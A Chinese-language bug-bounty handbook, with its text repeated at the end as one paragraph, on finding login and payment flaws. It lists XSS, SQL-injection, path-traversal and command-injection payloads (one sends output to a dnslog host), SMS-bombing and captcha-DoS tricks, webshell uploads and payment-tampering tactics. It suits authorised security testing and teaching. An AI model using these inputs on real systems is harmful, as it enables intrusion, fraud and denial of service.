src-歪门邪道分享+支付漏洞挖掘

字数 2338 2025-08-23 18:31:25

支付漏洞与登录安全漏洞挖掘技术手册

登录口界面漏洞挖掘技术

1. 登陆口常见攻击面

短信轰炸
任意用户注册
验证码漏洞（登陆/注册/找回密码）
密码爆破
Nday漏洞利用
弱口令攻击
DDoS攻击
注入攻击
枚举攻击
越权访问
二维码劫持
JS漏洞利用
URL操纵
返回包分析
信息泄露
RCE（远程代码执行）
XSS（跨站脚本）
SQL注入

2. 弱口令攻击方法

常见组合尝试：
- admin/admin
- admin/123456
- admin/admin888
- 建议积累常用字典
进阶方法：
- 查找系统用户手册获取默认凭证
- GitHub搜索相关系统的默认凭证
- 检查页面源码中是否硬编码管理员密码
TOP10攻击：
- 万能密码(SQL注入)
- XSS漏洞测试
- 逻辑漏洞分析

3. 登录框XSS漏洞

测试方法：

输入特殊字符如 `、( 等
观察页面是否出现errcode
从前端JS查找errcode值是否传入前端

尝试以下payload：

?errcode=123;confirm(1)//
?errcode=123;prompt(1)//
?errcode=123;alert(1)//
?url=javascript:alert'1'

短信验证码漏洞挖掘

1. 短信轰炸技术

基础方法：
- 手机号后加","和数字：18888888888,1,2,3,4
- 绕过限制：手机号前加空格
高级绕过：
- 修改XFF头为127.0.0.1
- 删除cookie

2. 短信轰炸编码绕过

方法：

对手机号部分编码：
- 原号：18888888888
- 编码后：%31%38888888888
- 可对任意位数进行部分编码

3. 其他绕过技术

小数点绕过：
```
phone=1888888888.0
```
&符号绕过：
```
"mobile":"18888888888&&&&19999999999"
```
每次多加一个&符号实现无限发送
双写绕过：
```
"mobile":"18888888888"&19999999999
```

4. 验证码绑定关系绕过

方法：

mobi1e=13555555555,18888888&c0de=134567
mobi1e=13555555555&mobile=18888888&code=134567
mobile=xxx,&mobile=yyyy

验证码漏洞挖掘

1. 验证码时效问题

多个密码使用同一个验证码
验证码超过有效期仍可使用

2. 图片验证码DoS

测试方法：

&height=1111&h=1111&size=1111&margin=1111

控制验证码大小参数导致服务器资源耗尽

3. 二维码登录漏洞

抓取二维码URL

修改尺寸参数：

?w=10000&h=10000
?width=1000&height=100
hegiht=1111
size=1111
margin=1111

4. 验证码DoS攻击原理

发送大尺寸验证码请求(如10000)
单个请求处理需10秒
发送10个请求需100秒处理
20-50个请求可使网站瘫痪

5. 图形验证码不失效漏洞

测试方法：

输入用户名、密码、验证码
拦截请求并重放5次
观察是否提示验证码错误

6. 验证码爆破

6位数验证码爆破100次以上
验证码有效期超过5分钟可尝试爆破其他手机号

返回包与跳转漏洞

1. 前台修改返回包

关键修改点：

Flase → true
0 → 1
fail → success
500 → 200
520 → 1

2. URL跳转漏洞

测试payload：

https://www.xxx.com/redirect.php?url=.123.com
https://www.xxx.com/redirect.php?url=/www.123.com
https://www.xxx.com/redirect.php?url=///www.123.com
https://www.xxx.com/redirect.php?url=//www.123.com@www.123.com
https://www.xxx.com/redirect.php?url=/www.123.com?www.123.com
https://www.xxx.com/redirect.php?url=/www.123.com#www.123.com
https://www.xxx.com/redirect.php?url=/www.123.com\\www.123.com

用户与权限漏洞

1. Fuzz隐藏参数

方法：

username=test&userpass=123456&usertype=1

尝试修改usertype等隐藏参数提升权限

2. 奇葩密码找回绕过

用户名user1，手机号改为user2的
使用收到的验证码更改user1的密码

3. 用户接管攻击

已知用户A昵称
用户B更改昵称为A
先改为C，抓包修改为A
放包后账号变成A，接管A账户

4. 企业注册漏洞

使用真实企业名称和统一信用代码注册
可能导致注册覆盖，获取内部信息

5. 企业注册上传Webshell

上传营业执照等文件时尝试上传Webshell
失败时可尝试并发上传

注入与命令执行漏洞

1. 登录框RCE

测试payload：

admin;whoami
username=admin;whoami.dnslog.com&password=123456

2. SQL注入

大厂绕过技巧：

采用延时注入
数字型：1 and sleep(1) --+
字符型：1' and sleep(1) and '
AND被过滤时用&&：
```
1 && 1 like sleep/**/(1)
```
Base64编码绕过：
```
MSBhbmQgc2xIZXAoMSk=  (延时1秒)
```

3. SSRF利用

方法：

利用HTML导出功能

获取指定文件内容：

<p><iframe src="http://tst.xxx.com/flag.html"></p>

获取内网图片：

业务逻辑漏洞

1. 业务回退漏洞

优惠券不能遍历时，领取后浏览器返回上一级
若能重新领取则存在漏洞
类似场景：用户修改密码成功后返回上一级

2. 文件下载漏洞

尝试下载/读取其他文件

../../无效时尝试多个../：

../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd

3. ID越权漏洞

重点检查点：

收货地址：修改别人ID，删除多余字段
订单：改为别人ID查看或操作
UID过长可设置为空查看隐藏参数

4. 子主账号越权

登录管理员账号抓包子账号请求
保留cookie并替换
重放数据包检查是否能获取相同数据

支付漏洞挖掘技术

1. 支付漏洞核心思路

低价获取商品：
- 负数购买
- 小数点购买
- 优惠调整
- 直接修改金额
- 替换商品参数
- 新人优惠并发
- 试用并发
- 修改type/free参数
拆分购买：
- 1周=7天=168小时
- 直接买1小时可能仅需1元
打折漏洞：
- 分析页面提示逻辑
零元购：
- 数量改为0
- 金额修改为0
- 支付类型修改

2. 实际支付漏洞

余额操作：
- 立即充值
- 首次充值
- 签约并发
- 重放修改数据包
- 四舍五入漏洞
- 小数点溢出

购买年限修改：

count=1year → count=1day
count=365 → count=1
count=aaa

返回包状态码修改：
- 尝试修改交易状态

3. 负数购买漏洞

恶意锁库存
修改数量/金币为负数
修改UID越权花别人钱
更改商品ID购买隐藏商品

4. 正负叠加漏洞

购买两件商品，数量一正一负提交

5. 优惠券漏洞

修改优惠券金额(如20→130)
计算好couponMenoy参数值
```
140-130=10
```

6. 重复支付漏洞

商品试用重放数据包
首单优惠无限重购

7. 并发漏洞结合

并发领取优惠券
并发下单
并发提现

8. 前端越权支付

示例：付费简历绕过

免费简历模板点击检查
选择预览模块HTML
复制整块HTML
替换到付费模块绕过支付

总结

本手册详细整理了登录和支付系统的各类安全漏洞挖掘技术，包括但不限于验证码绕过、短信轰炸、业务逻辑漏洞、注入攻击、越权访问等。安全研究人员应遵循合法合规的原则，仅在授权范围内测试系统漏洞。企业安全团队可根据本手册内容检查自身系统安全性，及时修补潜在漏洞。

支付漏洞与登录安全漏洞挖掘技术手册登录口界面漏洞挖掘技术 1. 登陆口常见攻击面短信轰炸任意用户注册验证码漏洞（登陆/注册/找回密码）密码爆破 Nday漏洞利用弱口令攻击 DDoS攻击注入攻击枚举攻击越权访问二维码劫持 JS漏洞利用 URL操纵返回包分析信息泄露 RCE（远程代码执行） XSS（跨站脚本） SQL注入 2. 弱口令攻击方法常见组合尝试： admin/admin admin/123456 admin/admin888 建议积累常用字典进阶方法：查找系统用户手册获取默认凭证 GitHub搜索相关系统的默认凭证检查页面源码中是否硬编码管理员密码 TOP10攻击：万能密码(SQL注入) XSS漏洞测试逻辑漏洞分析 3. 登录框XSS漏洞测试方法：输入特殊字符如 ` 、( 等观察页面是否出现errcode 从前端JS查找errcode值是否传入前端尝试以下payload：短信验证码漏洞挖掘 1. 短信轰炸技术基础方法：手机号后加","和数字： 18888888888,1,2,3,4 绕过限制：手机号前加空格高级绕过：修改XFF头为127.0.0.1 删除cookie 2. 短信轰炸编码绕过方法：对手机号部分编码：原号：18888888888 编码后：%31%38888888888 可对任意位数进行部分编码 3. 其他绕过技术小数点绕过： &符号绕过：每次多加一个&符号实现无限发送双写绕过： 4. 验证码绑定关系绕过方法：验证码漏洞挖掘 1. 验证码时效问题多个密码使用同一个验证码验证码超过有效期仍可使用 2. 图片验证码DoS 测试方法：控制验证码大小参数导致服务器资源耗尽 3. 二维码登录漏洞抓取二维码URL 修改尺寸参数： 4. 验证码DoS攻击原理发送大尺寸验证码请求(如10000) 单个请求处理需10秒发送10个请求需100秒处理 20-50个请求可使网站瘫痪 5. 图形验证码不失效漏洞测试方法：输入用户名、密码、验证码拦截请求并重放5次观察是否提示验证码错误 6. 验证码爆破 6位数验证码爆破100次以上验证码有效期超过5分钟可尝试爆破其他手机号返回包与跳转漏洞 1. 前台修改返回包关键修改点： Flase → true 0 → 1 fail → success 500 → 200 520 → 1 2. URL跳转漏洞测试payload ：用户与权限漏洞 1. Fuzz隐藏参数方法：尝试修改usertype等隐藏参数提升权限 2. 奇葩密码找回绕过用户名user1，手机号改为user2的使用收到的验证码更改user1的密码 3. 用户接管攻击已知用户A昵称用户B更改昵称为A 先改为C，抓包修改为A 放包后账号变成A，接管A账户 4. 企业注册漏洞使用真实企业名称和统一信用代码注册可能导致注册覆盖，获取内部信息 5. 企业注册上传Webshell 上传营业执照等文件时尝试上传Webshell 失败时可尝试并发上传注入与命令执行漏洞 1. 登录框RCE 测试payload ： 2. SQL注入大厂绕过技巧：采用延时注入数字型： 1 and sleep(1) --+ 字符型： 1' and sleep(1) and ' AND被过滤时用 && ： Base64编码绕过： 3. SSRF利用方法：利用HTML导出功能获取指定文件内容：获取内网图片：业务逻辑漏洞 1. 业务回退漏洞优惠券不能遍历时，领取后浏览器返回上一级若能重新领取则存在漏洞类似场景：用户修改密码成功后返回上一级 2. 文件下载漏洞尝试下载/读取其他文件 ../../ 无效时尝试多个 ../ ： 3. ID越权漏洞重点检查点：收货地址：修改别人ID，删除多余字段订单：改为别人ID查看或操作 UID过长可设置为空查看隐藏参数 4. 子主账号越权登录管理员账号抓包子账号请求保留cookie并替换重放数据包检查是否能获取相同数据支付漏洞挖掘技术 1. 支付漏洞核心思路低价获取商品：负数购买小数点购买优惠调整直接修改金额替换商品参数新人优惠并发试用并发修改type/free参数拆分购买： 1周=7天=168小时直接买1小时可能仅需1元打折漏洞：分析页面提示逻辑零元购：数量改为0 金额修改为0 支付类型修改 2. 实际支付漏洞余额操作：立即充值首次充值签约并发重放修改数据包四舍五入漏洞小数点溢出购买年限修改：返回包状态码修改：尝试修改交易状态 3. 负数购买漏洞恶意锁库存修改数量/金币为负数修改UID越权花别人钱更改商品ID购买隐藏商品 4. 正负叠加漏洞购买两件商品，数量一正一负提交 5. 优惠券漏洞修改优惠券金额(如20→130) 计算好couponMenoy参数值 6. 重复支付漏洞商品试用重放数据包首单优惠无限重购 7. 并发漏洞结合并发领取优惠券并发下单并发提现 8. 前端越权支付示例：付费简历绕过免费简历模板点击检查选择预览模块HTML 复制整块HTML 替换到付费模块绕过支付总结本手册详细整理了登录和支付系统的各类安全漏洞挖掘技术，包括但不限于验证码绕过、短信轰炸、业务逻辑漏洞、注入攻击、越权访问等。安全研究人员应遵循合法合规的原则，仅在授权范围内测试系统漏洞。企业安全团队可根据本手册内容检查自身系统安全性，及时修补潜在漏洞。